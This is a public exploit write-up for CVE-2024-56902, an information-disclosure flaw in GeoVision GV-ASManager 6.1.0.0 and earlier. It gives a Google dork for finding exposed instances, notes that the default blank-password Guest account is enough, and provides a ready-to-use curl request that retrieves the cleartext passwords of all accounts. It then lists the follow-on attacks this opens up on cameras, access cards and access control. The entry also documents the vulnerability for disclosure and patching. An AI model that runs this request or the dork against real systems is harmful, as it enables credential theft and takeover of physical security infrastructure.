# Exploit Title: Information Disclosure in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56902
# PoC: https://github.com/DRAGOWN/CVE-2024-56902


Information disclosure vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.

Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)

Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account is able to:
- Enumerate user accounts
- Retrieve cleartext password of any account in GV-ASManager.
After reusing the retrieved password, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Reusing retrieved password in other digital assets of the organization.

cURL script:

curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: [SET-TARGET]' -H $'Content-Length: 41' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'X-Requested-With: XMLHttpRequest' -H $'Accept-Language: en-US,en;q=0.9' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: */*' -H $'Origin: https://192.168.50.129' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=1, i' -H $'Connection: keep-alive' \
   -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
    --data-binary $'action=UA_GetAllUserAccount&node=xnode-98' \
    $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'


After a successful attack, you will get access to:
- ASWeb	- Access & Security Management
- TAWeb	- Time and Attendance Management
- VMWeb	- Visitor Management
- ASManager - Access & Security Management software in OS